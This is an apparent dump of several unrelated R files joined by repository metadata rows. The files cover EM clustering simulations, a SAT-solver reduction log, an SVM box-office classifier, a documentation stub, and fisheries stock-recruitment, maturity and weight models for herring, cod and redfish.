pi=c(0.2,0.4,0.3,0.1)
sigma=diag(k)
b=matrix(rep(0,times=k*g),nrow=g,byrow=TRUE) # initialize betas
b[1:100,]<-matrix(rep(c(10,10.5,11,9.5),times=100),nrow=100,byrow=TRUE) # Fixing the means to ensure no nondiscriminatory cases
b[1:50,]<-matrix(rep(c(9.5,9.5,9.5,9.5),times=50),nrow=50)
for(ii in 1:sim){
simulate_data=function(n,k,g,init_pi,b){
y<-matrix(rep(0,times=g*n),nrow=g) # initialize count matrix gxn #
# Prepare new flattened data
z = rmultinom(n,1,init_pi)
# while(any(rowSums(z)==0)){z=rmultinom(n,1,init_pi)} # makes sure that no one cluster simulated @ 0 membership (only good for simulations)
for(j in 1:g){
for(c in 1:k){
y[j,z[c,]==1] = rpois(sum(z[c,]==1), lambda = exp(b[j,c]))
}
}
result<-list(y=y,z=z)
return(result)
}
sim.dat<-simulate_data(n=n,k=k,g=g,init_pi=pi,b=b)
y<-sim.dat$y+1
z<-sim.dat$z
true_clusters<-rep(0,times=n)
for(i in 1:n){
true_clusters[i]<-which(z[,i]==1)
}
row_names<-paste("gene",seq(g))
col_names<-paste("subj",seq(n))
cts<-as.matrix(y)
rownames(cts)<-row_names
colnames(cts)<-col_names
coldata<-matrix(paste("cl",true_clusters,sep=""),nrow=n)
rownames(coldata)<-colnames(cts)
colnames(coldata)<-"cluster"
dds<-DESeqDataSetFromMatrix(countData = cts,
colData = coldata,
design = ~ 1)
DESeq_dds<-DESeq(dds)
size_factors<-estimateSizeFactors(dds)$sizeFactor
norm_y<-counts(DESeq_dds,normalized=TRUE)
# scaled_y<-y
# for(i in 1:n){
# scaled_y[,i]<-y[,i]/size_factors[i]
# }
######### Order Selection (using unpenalized model) ##########
source("C:/Users/David/Desktop/Research/EM/Pan EM.R")
#source("C:/Users/David/Desktop/Research/EM/unpenalized EM.R")
K_search=c(2:8)
list_BIC=matrix(0,nrow=length(K_search),ncol=2)
list_BIC[,1]=K_search
print(paste("Iteration",ii,":"))
for(aa in 1:nrow(list_BIC)){
#nam <- paste("Xpen",list_BIC[aa,1],sep="")
#assign(nam,EM(y=y,k=list_BIC[aa,1],lambda1=0,lambda2=0,tau=0,size_factors=size_factors))
list_BIC[aa,2]<-EM(y=y,k=list_BIC[aa,1],lambda1=0,lambda2=0,tau=0,size_factors=size_factors)$BIC # no penalty Pan
#list_BIC[aa,2]<-EM(y=y,k=list_BIC[aa,1],size_factors=size_factors)$BIC # unpenalized (not Pan)
print(list_BIC[aa,])
}
max_k=list_BIC[which(list_BIC[,2]==min(list_BIC[,2])),1]
choose_k[ii]<-max_k
}
table(choose_k)
# library("optCluster")
# opt.cl<-optCluster(round(scaled_y,0),2:8,clMethods="em.poisson",countData=TRUE)
########## PAN ##########
source("C:/Users/David/Desktop/Research/EM/Pan EM.R")
lambda1_search=seq(from=0.1,to=2,length.out=10)
lambda2_search=seq(from=0.1,to=2,length.out=10)
tau_search=seq(from=1,to=2,length.out=5) # nullifies tau param
list_BIC=matrix(0,nrow=length(lambda1_search)*length(lambda2_search)*length(tau_search),ncol=4) #matrix of BIC's: lambda1 and lambda2 and K, 49*5 combinations
list_BIC[,1]=rep(lambda1_search,each=length(lambda2_search)*length(tau_search))
list_BIC[,2]=rep(rep(lambda2_search,each=length(tau_search)),times=length(lambda1_search))
list_BIC[,3]=rep(tau_search,times=length(lambda1_search)*length(lambda2_search))
for(aa in 1:nrow(list_BIC)){
list_BIC[aa,4]<-EM(y=y,k=max_k,tau=list_BIC[aa,3],lambda1=list_BIC[aa,1],lambda2=list_BIC[aa,2],size_factors=size_factors)$BIC
print(list_BIC[aa,])
}
max_index<-which(list_BIC[,4]==min(list_BIC[,4]))
max_tau<-list_BIC[max_index,3]
max_lambda1<-list_BIC[max_index,1]
max_lambda2<-list_BIC[max_index,2]
#
#
#
#
#
#
#
# ######### GLMNET ########
# source("C:/Users/David/Desktop/Research/EM/group lasso EM.R")
# alpha_search=seq(from=0,to=1,by=0.2)
# lambda_search=seq(from=0,to=5,by=0.5)
# list_BIC=matrix(0,nrow=length(alpha_search)*length(lambda_search),ncol=3)
# list_BIC[,1]=rep(alpha_search,each=length(lambda_search))
# list_BIC[,2]=rep(lambda_search,times=length(alpha_search))
#
# for(aa in 1:nrow(list_BIC)){
# list_BIC[aa,3]<-EM(y=y,k=max_k,alpha=list_BIC[aa,1],lambda=list_BIC[aa,2],size_factors<-size_factors)$BIC
# print(list_BIC[aa,])
# }
#
# max_index<-which(list_BIC[,3]==min(list_BIC[,3]))
#
# max_alpha<-list_BIC[max_index,1]
# max_lambda<-list_BIC[max_index,2]
#
#
#
#
#
#
#
#
#
#
| /Simulations/real_dat_simulations.R | no_license | DavidKLim/EM | R | false | false | 4,488 | r | #setwd("/netscr/deelim")
setwd("C:/Users/David/Desktop/Research/EM")
source("Pan EM.R") # Pan method
library(MASS)
# Simulations to choose K
sim=100
choose_k<-rep(0,times=sim)
n=20
g=100
k=4
pi=c(0.2,0.4,0.3,0.1)
sigma=diag(k)
b=matrix(rep(0,times=k*g),nrow=g,byrow=TRUE) # initialize betas
b[1:100,]<-matrix(rep(c(10,10.5,11,9.5),times=100),nrow=100,byrow=TRUE) # Fixing the means to ensure no nondiscriminatory cases
b[1:50,]<-matrix(rep(c(9.5,9.5,9.5,9.5),times=50),nrow=50)
for(ii in 1:sim){
simulate_data=function(n,k,g,init_pi,b){
y<-matrix(rep(0,times=g*n),nrow=g) # initialize count matrix gxn #
# Prepare new flattened data
z = rmultinom(n,1,init_pi)
# while(any(rowSums(z)==0)){z=rmultinom(n,1,init_pi)} # makes sure that no one cluster simulated @ 0 membership (only good for simulations)
for(j in 1:g){
for(c in 1:k){
y[j,z[c,]==1] = rpois(sum(z[c,]==1), lambda = exp(b[j,c]))
}
}
result<-list(y=y,z=z)
return(result)
}
sim.dat<-simulate_data(n=n,k=k,g=g,init_pi=pi,b=b)
y<-sim.dat$y+1
z<-sim.dat$z
true_clusters<-rep(0,times=n)
for(i in 1:n){
true_clusters[i]<-which(z[,i]==1)
}
row_names<-paste("gene",seq(g))
col_names<-paste("subj",seq(n))
cts<-as.matrix(y)
rownames(cts)<-row_names
colnames(cts)<-col_names
coldata<-matrix(paste("cl",true_clusters,sep=""),nrow=n)
rownames(coldata)<-colnames(cts)
colnames(coldata)<-"cluster"
dds<-DESeqDataSetFromMatrix(countData = cts,
colData = coldata,
design = ~ 1)
DESeq_dds<-DESeq(dds)
size_factors<-estimateSizeFactors(dds)$sizeFactor
norm_y<-counts(DESeq_dds,normalized=TRUE)
# scaled_y<-y
# for(i in 1:n){
# scaled_y[,i]<-y[,i]/size_factors[i]
# }
######### Order Selection (using unpenalized model) ##########
source("C:/Users/David/Desktop/Research/EM/Pan EM.R")
#source("C:/Users/David/Desktop/Research/EM/unpenalized EM.R")
K_search=c(2:8)
list_BIC=matrix(0,nrow=length(K_search),ncol=2)
list_BIC[,1]=K_search
print(paste("Iteration",ii,":"))
for(aa in 1:nrow(list_BIC)){
#nam <- paste("Xpen",list_BIC[aa,1],sep="")
#assign(nam,EM(y=y,k=list_BIC[aa,1],lambda1=0,lambda2=0,tau=0,size_factors=size_factors))
list_BIC[aa,2]<-EM(y=y,k=list_BIC[aa,1],lambda1=0,lambda2=0,tau=0,size_factors=size_factors)$BIC # no penalty Pan
#list_BIC[aa,2]<-EM(y=y,k=list_BIC[aa,1],size_factors=size_factors)$BIC # unpenalized (not Pan)
print(list_BIC[aa,])
}
max_k=list_BIC[which(list_BIC[,2]==min(list_BIC[,2])),1]
choose_k[ii]<-max_k
}
table(choose_k)
# library("optCluster")
# opt.cl<-optCluster(round(scaled_y,0),2:8,clMethods="em.poisson",countData=TRUE)
########## PAN ##########
source("C:/Users/David/Desktop/Research/EM/Pan EM.R")
lambda1_search=seq(from=0.1,to=2,length.out=10)
lambda2_search=seq(from=0.1,to=2,length.out=10)
tau_search=seq(from=1,to=2,length.out=5) # nullifies tau param
list_BIC=matrix(0,nrow=length(lambda1_search)*length(lambda2_search)*length(tau_search),ncol=4) #matrix of BIC's: lambda1 and lambda2 and K, 49*5 combinations
list_BIC[,1]=rep(lambda1_search,each=length(lambda2_search)*length(tau_search))
list_BIC[,2]=rep(rep(lambda2_search,each=length(tau_search)),times=length(lambda1_search))
list_BIC[,3]=rep(tau_search,times=length(lambda1_search)*length(lambda2_search))
for(aa in 1:nrow(list_BIC)){
list_BIC[aa,4]<-EM(y=y,k=max_k,tau=list_BIC[aa,3],lambda1=list_BIC[aa,1],lambda2=list_BIC[aa,2],size_factors=size_factors)$BIC
print(list_BIC[aa,])
}
max_index<-which(list_BIC[,4]==min(list_BIC[,4]))
max_tau<-list_BIC[max_index,3]
max_lambda1<-list_BIC[max_index,1]
max_lambda2<-list_BIC[max_index,2]
#
#
#
#
#
#
#
# ######### GLMNET ########
# source("C:/Users/David/Desktop/Research/EM/group lasso EM.R")
# alpha_search=seq(from=0,to=1,by=0.2)
# lambda_search=seq(from=0,to=5,by=0.5)
# list_BIC=matrix(0,nrow=length(alpha_search)*length(lambda_search),ncol=3)
# list_BIC[,1]=rep(alpha_search,each=length(lambda_search))
# list_BIC[,2]=rep(lambda_search,times=length(alpha_search))
#
# for(aa in 1:nrow(list_BIC)){
# list_BIC[aa,3]<-EM(y=y,k=max_k,alpha=list_BIC[aa,1],lambda=list_BIC[aa,2],size_factors<-size_factors)$BIC
# print(list_BIC[aa,])
# }
#
# max_index<-which(list_BIC[,3]==min(list_BIC[,3]))
#
# max_alpha<-list_BIC[max_index,1]
# max_lambda<-list_BIC[max_index,2]
#
#
#
#
#
#
#
#
#
#
|
c DCNF-Autarky [version 0.0.1].
c Copyright (c) 2018-2019 Swansea University.
c
c Input Clause Count: 19996
c Performing E1-Autarky iteration.
c Remaining clauses count after E-Reduction: 19995
c
c Performing E1-Autarky iteration.
c Remaining clauses count after E-Reduction: 19995
c
c Input Parameter (command line, file):
c input filename QBFLIB/Basler/terminator/stmt19_352_408.qdimacs
c output filename /tmp/dcnfAutarky.dimacs
c autarky level 1
c conformity level 0
c encoding type 2
c no.of var 5870
c no.of clauses 19996
c no.of taut cls 0
c
c Output Parameters:
c remaining no.of clauses 19995
c
c QBFLIB/Basler/terminator/stmt19_352_408.qdimacs 5870 19996 E1 [1] 0 280 5589 19995 RED
| /code/dcnf-ankit-optimized/Results/QBFLIB-2018/E1/Experiments/Basler/terminator/stmt19_352_408/stmt19_352_408.R | no_license | arey0pushpa/dcnf-autarky | R | false | false | 720 | r | c DCNF-Autarky [version 0.0.1].
c Copyright (c) 2018-2019 Swansea University.
c
c Input Clause Count: 19996
c Performing E1-Autarky iteration.
c Remaining clauses count after E-Reduction: 19995
c
c Performing E1-Autarky iteration.
c Remaining clauses count after E-Reduction: 19995
c
c Input Parameter (command line, file):
c input filename QBFLIB/Basler/terminator/stmt19_352_408.qdimacs
c output filename /tmp/dcnfAutarky.dimacs
c autarky level 1
c conformity level 0
c encoding type 2
c no.of var 5870
c no.of clauses 19996
c no.of taut cls 0
c
c Output Parameters:
c remaining no.of clauses 19995
c
c QBFLIB/Basler/terminator/stmt19_352_408.qdimacs 5870 19996 E1 [1] 0 280 5589 19995 RED
|
#rm(list=ls(all=TRUE))
library('e1071')
library(plyr)
library(rgl)
library(scatterplot3d)
AAPL = read.csv('Youtubelist.csv')
AAPL = AAPL[,-c(1,2,3,10)]#Range to process
for(i in 1:7)
AAPL = AAPL[!is.na(AAPL[,i]),]
#AAPL = AAPL[sample(nrow(AAPL),3000),]#Sampling
#AAPL = AAPL[order(AAPL$Box),]
AAPL$Youtube.Views = scale(AAPL$Youtube.Views)
#AAPL$Box = scale(AAPL$Box)
#AAPL$Budget[is.na(AAPL$Budget)] = mean(AAPL$Budget[!is.na(AAPL$Budget)])
#AAPL$Youtube.Views = scale(AAPL$Youtube.Views)
#plot(AAPL$Box)
AAPL = as.data.frame(AAPL)
np = ceiling(0.2 * nrow(AAPL))
#Y = ifelse(AAPL$Box>40000000,1,0)
AAPL$Y = c(rep(0,length(AAPL$Box)))
#ranklist = c(-1,1e7L,5e7L,1e7L,2e8L)
ranklist = c(-1,7e6L,3e7L,7e7L,1e8L)
ranklist = as.numeric(ranklist)
for(i in 2:length(ranklist))
{
AAPL$Y[AAPL$Box<=ranklist[i] & AAPL$Box>ranklist[i-1]] = i-1
}
AAPL$Y[AAPL$Box>ranklist[length(ranklist)]] = length(ranklist)
AAPL = AAPL[,-1]
test.index = sample(1:nrow(AAPL), np)
#test.index = 1:np
AAPL.test = AAPL[test.index, ]
AAPL.train = AAPL[-test.index, ]
tuned = tune.svm(Y ~ ., data = AAPL.train, gamma = 2^(-7:-5), cost = 2^(2:4))
#summary(tuned)
if(nrow(count(AAPL.train$Y))>1)
{
svm.model = svm(Y ~ ., data = AAPL.train, kernal='radial', type = 'C-classification', cost = 16, gamma = 0.03125)
#svm.model = readRDS("movie.svmodel")
svm.pred = predict(svm.model, AAPL.test[, -7])
table.svm.test = table(pred = svm.pred, true = AAPL.test[, 7])
correct.svm = sum(diag(table.svm.test) / sum(table.svm.test)) * 100
result = cbind(AAPL.test, svm.pred)
result = result[order(result$Y),]#Sorting
plot(result$svm.pred, result$Y)
for(i in 1:5)
{
plot(table(result$Genre[result$Y==i]),col='green', xlab="Genre", ylab="Number", main="Pred Box(red) vs Box(green)")
points(table(result$Genre[result$svm.pred==i]),col='red')
}
for(i in 1:5)
{
plot(table(result$MPAA[result$Y==i]),col='green', xlab="MPAA", ylab="Number", main="Pred Box(red) vs Box(green)")
points(table(result$MPAA[result$svm.pred==i]),col='red')
}
plot3d(result$Genre, result$MPAA, result$Y, main="3D scatterplot", pch=16, highlight.3d = TRUE, type="h", col=c('red','green','blue'))
plot3d(result$Genre, result$MPAA[result$MPAA=="PG-13"], result$Y, main="3D scatterplot", pch=16, highlight.3d = TRUE, type="h", col=c('red','green','blue'))
}else{
print("Assert: There is only one label.")
}
| /Odds_Ends/test6.R | no_license | peter0749/Project_R | R | false | false | 2,401 | r | #rm(list=ls(all=TRUE))
library('e1071')
library(plyr)
library(rgl)
library(scatterplot3d)
AAPL = read.csv('Youtubelist.csv')
AAPL = AAPL[,-c(1,2,3,10)]#Range to process
for(i in 1:7)
AAPL = AAPL[!is.na(AAPL[,i]),]
#AAPL = AAPL[sample(nrow(AAPL),3000),]#Sampling
#AAPL = AAPL[order(AAPL$Box),]
AAPL$Youtube.Views = scale(AAPL$Youtube.Views)
#AAPL$Box = scale(AAPL$Box)
#AAPL$Budget[is.na(AAPL$Budget)] = mean(AAPL$Budget[!is.na(AAPL$Budget)])
#AAPL$Youtube.Views = scale(AAPL$Youtube.Views)
#plot(AAPL$Box)
AAPL = as.data.frame(AAPL)
np = ceiling(0.2 * nrow(AAPL))
#Y = ifelse(AAPL$Box>40000000,1,0)
AAPL$Y = c(rep(0,length(AAPL$Box)))
#ranklist = c(-1,1e7L,5e7L,1e7L,2e8L)
ranklist = c(-1,7e6L,3e7L,7e7L,1e8L)
ranklist = as.numeric(ranklist)
for(i in 2:length(ranklist))
{
AAPL$Y[AAPL$Box<=ranklist[i] & AAPL$Box>ranklist[i-1]] = i-1
}
AAPL$Y[AAPL$Box>ranklist[length(ranklist)]] = length(ranklist)
AAPL = AAPL[,-1]
test.index = sample(1:nrow(AAPL), np)
#test.index = 1:np
AAPL.test = AAPL[test.index, ]
AAPL.train = AAPL[-test.index, ]
tuned = tune.svm(Y ~ ., data = AAPL.train, gamma = 2^(-7:-5), cost = 2^(2:4))
#summary(tuned)
if(nrow(count(AAPL.train$Y))>1)
{
svm.model = svm(Y ~ ., data = AAPL.train, kernal='radial', type = 'C-classification', cost = 16, gamma = 0.03125)
#svm.model = readRDS("movie.svmodel")
svm.pred = predict(svm.model, AAPL.test[, -7])
table.svm.test = table(pred = svm.pred, true = AAPL.test[, 7])
correct.svm = sum(diag(table.svm.test) / sum(table.svm.test)) * 100
result = cbind(AAPL.test, svm.pred)
result = result[order(result$Y),]#Sorting
plot(result$svm.pred, result$Y)
for(i in 1:5)
{
plot(table(result$Genre[result$Y==i]),col='green', xlab="Genre", ylab="Number", main="Pred Box(red) vs Box(green)")
points(table(result$Genre[result$svm.pred==i]),col='red')
}
for(i in 1:5)
{
plot(table(result$MPAA[result$Y==i]),col='green', xlab="MPAA", ylab="Number", main="Pred Box(red) vs Box(green)")
points(table(result$MPAA[result$svm.pred==i]),col='red')
}
plot3d(result$Genre, result$MPAA, result$Y, main="3D scatterplot", pch=16, highlight.3d = TRUE, type="h", col=c('red','green','blue'))
plot3d(result$Genre, result$MPAA[result$MPAA=="PG-13"], result$Y, main="3D scatterplot", pch=16, highlight.3d = TRUE, type="h", col=c('red','green','blue'))
}else{
print("Assert: There is only one label.")
}
|
\name{sapa.combined}
\alias{sapa.combined}
%- Also NEED an '\alias' for EACH other topic documented here.
\title{
sapa.combined}
\description{
Returns the object for remapping with different parameters}
\usage{
sapa.combined(df, DV, gridsize = 300, database = "usa", regions = ".", average = TRUE, size = 11, miss = 0.05, ncols = NULL, main = "SAPA combined")
}
%- maybe also 'usage' for other objects documented here.
\arguments{
\item{df}{
%% ~~Describe \code{df} here~~
}
\item{DV}{
%% ~~Describe \code{DV} here~~
}
\item{gridsize}{
%% ~~Describe \code{gridsize} here~~
}
\item{database}{
%% ~~Describe \code{database} here~~
}
\item{regions}{
%% ~~Describe \code{regions} here~~
}
\item{average}{
%% ~~Describe \code{average} here~~
}
\item{size}{
%% ~~Describe \code{size} here~~
}
\item{miss}{
%% ~~Describe \code{miss} here~~
}
\item{ncols}{
%% ~~Describe \code{ncols} here~~
}
\item{main}{
%% ~~Describe \code{main} here~~
}
}
\details{
%% ~~ If necessary, more details than the description above ~~
}
\value{
%% ~Describe the value returned
%% If it is a LIST, use
%% \item{comp1 }{Description of 'comp1'}
%% \item{comp2 }{Description of 'comp2'}
%% ...
}
\references{
https://sapa-project.org/r/}
\author{
William Revelle <revelle@northwestern.edu>
Maintainer: Jason A. French
}
\note{
Please file bugs at https://github.com/frenchja/SAPATools/issues.}
%% ~Make other sections like Warning with \section{Warning }{....} ~
\seealso{
%% ~~objects to See Also as \code{\link{help}}, ~~~
}
\examples{
# my.zips <- sapa.zip(IRT.scores)
# g <- sapa.combined(my.zips,'g',gridsize=400,main='ICAR IQ scores from the SAPA project')
}
| /man/sapa.combined.Rd | no_license | frenchja/SAPATools | R | false | false | 1,703 | rd | \name{sapa.combined}
\alias{sapa.combined}
%- Also NEED an '\alias' for EACH other topic documented here.
\title{
sapa.combined}
\description{
Returns the object for remapping with different parameters}
\usage{
sapa.combined(df, DV, gridsize = 300, database = "usa", regions = ".", average = TRUE, size = 11, miss = 0.05, ncols = NULL, main = "SAPA combined")
}
%- maybe also 'usage' for other objects documented here.
\arguments{
\item{df}{
%% ~~Describe \code{df} here~~
}
\item{DV}{
%% ~~Describe \code{DV} here~~
}
\item{gridsize}{
%% ~~Describe \code{gridsize} here~~
}
\item{database}{
%% ~~Describe \code{database} here~~
}
\item{regions}{
%% ~~Describe \code{regions} here~~
}
\item{average}{
%% ~~Describe \code{average} here~~
}
\item{size}{
%% ~~Describe \code{size} here~~
}
\item{miss}{
%% ~~Describe \code{miss} here~~
}
\item{ncols}{
%% ~~Describe \code{ncols} here~~
}
\item{main}{
%% ~~Describe \code{main} here~~
}
}
\details{
%% ~~ If necessary, more details than the description above ~~
}
\value{
%% ~Describe the value returned
%% If it is a LIST, use
%% \item{comp1 }{Description of 'comp1'}
%% \item{comp2 }{Description of 'comp2'}
%% ...
}
\references{
https://sapa-project.org/r/}
\author{
William Revelle <revelle@northwestern.edu>
Maintainer: Jason A. French
}
\note{
Please file bugs at https://github.com/frenchja/SAPATools/issues.}
%% ~Make other sections like Warning with \section{Warning }{....} ~
\seealso{
%% ~~objects to See Also as \code{\link{help}}, ~~~
}
\examples{
# my.zips <- sapa.zip(IRT.scores)
# g <- sapa.combined(my.zips,'g',gridsize=400,main='ICAR IQ scores from the SAPA project')
}
|
library(tidyverse)
library(gridExtra)
library(ggplot2)
library(dplyr)
library(gridExtra)
library(reshape2)
library(openxlsx)
library(TMB)
library(here)
library(png)
#####------------ NOTES -------------------#####
# - nll for parameter estimation is log-likelihood
# - SSB is real numbers & SSB1 is theoretical numbers
#------------------------- DATASETS -------------------------------#
nsshass <-read.xlsx(here('Scripts_R/NSSH assessment.xlsx'),sheet=1)
nsshmaturity<-read.xlsx(here('Scripts/NSSH assessment.xlsx'),sheet=2)
nsshweight <- read.xlsx(here('Scripts/NSSH assessment.xlsx'), sheet=3)
nsshfmort<-read.xlsx(here('Scripts/NSSH assessment.xlsx'),sheet=4)
codass <-read.xlsx(here('Scripts_R/Cod_assessment.xlsx'),sheet=1)
#for biased plotting codass <- codass[-74,]
# colnames(codass)[5] <- "SSB"
# colnames(codass)[6] <- "SSBhigh"
# colnames(codass)[7] <- "SSBlow"
codmaturity<-read.xlsx(here('Scripts/Cod_assessment.xlsx'),sheet=2)
codweight <- read.xlsx(here('Scripts/Cod_assessment.xlsx'), sheet=3)
codfmort<-read.xlsx(here('Scripts/Cod_assessment.xlsx'),sheet=4)
#for biased plotting
#redfishass <-read.xlsx(here('Scripts/S.mentella_assessment.xlsx'),sheet=1) # Advice2020
# colnames(redfishass)[3] <- "SSB"
#colnames(redfishass)[4] <- "SSBhigh"
#colnames(redfishass)[5] <- "SSBlow"
redfishass <-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=2) # Advice2018
redfishass2 <-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=3) # AFWG2019
redfishmaturity<-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=4)
redfishweight <- read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'), sheet=5)
redfishfmort<-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=6)
#######################################################################
######--------------- NSSH --------------- #############
#######################################################################
#### Setting up general parameters
age <- c(2:15)
recage<-2
start.rec <- mean(nsshass$Rec.age2)*1000
#### Recruitment: important to correct for the rec.age offset ####
tsl<-length(nsshass$Year)
Rec <- nsshass$Rec.age2[(recage+1):tsl]*1000 #assessment recruitment
SSB <- nsshass$SSB[1:(tsl-(recage))] # assessment ssb
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
## 5. Ricker
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB), data=data,start=list(alpha=5,beta=-1))
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
#Recruitment5 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd<-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation1<-acf(residuals(nlsrssb))
AR1par<-autocorrelation1$acf[2]
Rvar.std <- mean(exp(rnorm(1e6,0,ricker.sd)))
SSB1 <- seq(0,9e6,1e5) # SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- SSB1/1000000 #for plotting
nsshRecruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #- Norm. dist error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation)/Rvar.std #- Stochasticy term
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) # autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf)/Rvar.std #- stochasticity term
plot(nsshRecruitment5~SSB1,type="l",col="red") #xlim=c(0, 9), ylim=c(0, 60), xlab="SSB1 million t", ylab="Rec billions") #,ylim=c(0,7e7))
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariation)/Rvar.std #- Stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr. error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf)/Rvar.std #- Stochasticity
plot(Recruitment5~SSB,type="l",col="red")
points(Recruitment5.1~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
tsl<-length(nsshass$Year)
Rec <- nsshass$Rec.age2[(recage+1):tsl]*1000 #assessment recruitment
SSB <- nsshass$SSB[1:(tsl-(recage))] # assessment ssb
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhnlsrssb <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhnlsrssb)$coefficients[1]
betabh <- summary(bhnlsrssb)$coefficients[2]
bh.sd<-sd(residuals(bhnlsrssb))
bhvar.std <- mean(exp(rnorm(1e6,0, bh.sd)))
bhvariation<- rnorm(length(SSB1),0,bh.sd)
SSB1 <- seq(0, 9e6, 1e5) # SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- SSB1/1000000 #for plotting
nsshRecruitment6 <- 1/(betabh + alphabh * 1/SSB1) # testing the alpha and beta, works!
Recruitment6.1 <- 1/(betabh + alphabh * 1/SSB1) * (1/(bhvariation))/bh.sd #- Stochasticy term
plot(nsshRecruitment6 ~ SSB1,type="l",col="red")
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
#----- Plotting all ---- #
## Combine the deterministic Ricker and BH curves (evaluated on the theoretical
## SSB1 grid) into one long data frame and plot both stock-recruit curves.
rec.vector <- c(nsshRecruitment5, nsshRecruitment6)
type <-rep(c("Ricker5", "BH"),each=length(nsshRecruitment5))
rec.df <- data.frame(Type=type, SSB=rep(SSB1,2),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec, color=Type)) + geom_line(size=1.5) +
scale_color_brewer(palette="Accent") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=15),
axis.text.x = element_text(size=15), axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20))
##### Maturity #####
## Fit a logistic maturity ogive 1/(1+exp(-(age-a50)/env)) to NSSH
## maturity-at-age via a TMB model; a50 = age at 50% maturity, env = slope.
maturity2 <-melt(nsshmaturity,id.vars="Year")
maturity2$Age <- rep(0:15,each=dim(nsshmaturity)[1])
maturity3 <- maturity2 %>% filter(Year>1987 & Age>1)
maturity3 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/maturity.cpp')
dyn.load(dynlib('Scripts/maturity'))
data<-list()
data$age<-maturity3$Age # changed it from maturity2 to maturity3 to use correct filter
data$mprop<-maturity3$value
param <- list()
param$a50 <- 4 # starting value: age at 50% maturity
param$env <- .2 # starting value: ogive slope
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity") # MakeADFun - automatic differentiation function
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((age-a50)/env))),2) ## used in simulation
maturity3$mprop.est <- 1/(1+exp(-((maturity3$Age-a50)/env)))
## Observed maturity (points) with the fitted ogive (line); panel tag "a".
nsshmat <- maturity3 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) + labs(y= "Maturity", x= "Age")+ theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="a")
##### Weights #####
## Fit a von Bertalanffy-type weight-at-age curve W = Winf*(1-exp(-k*age))^b
## to NSSH weight data via a TMB model.
weights2 <-melt(nsshweight,id.vars="Year")
weights2$Age <- rep(0:15,each=dim(nsshweight)[1])
weights3 <- weights2 %>% filter(Year>1987 & Age>1)
weights3 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/weight.cpp')
dyn.load(dynlib('Scripts/weight'))
data<-list()
data$age<-weights3$Age # changed it from weights2 to weights3 to use correct filter
data$wprop<-weights3$value
param <- list()
param$k <- 0.4 # starting value: growth rate
param$b <- 3 # starting value: exponent
param$Winf <- 0.4 # starting value: asymptotic weight
param$logsigma <- 0
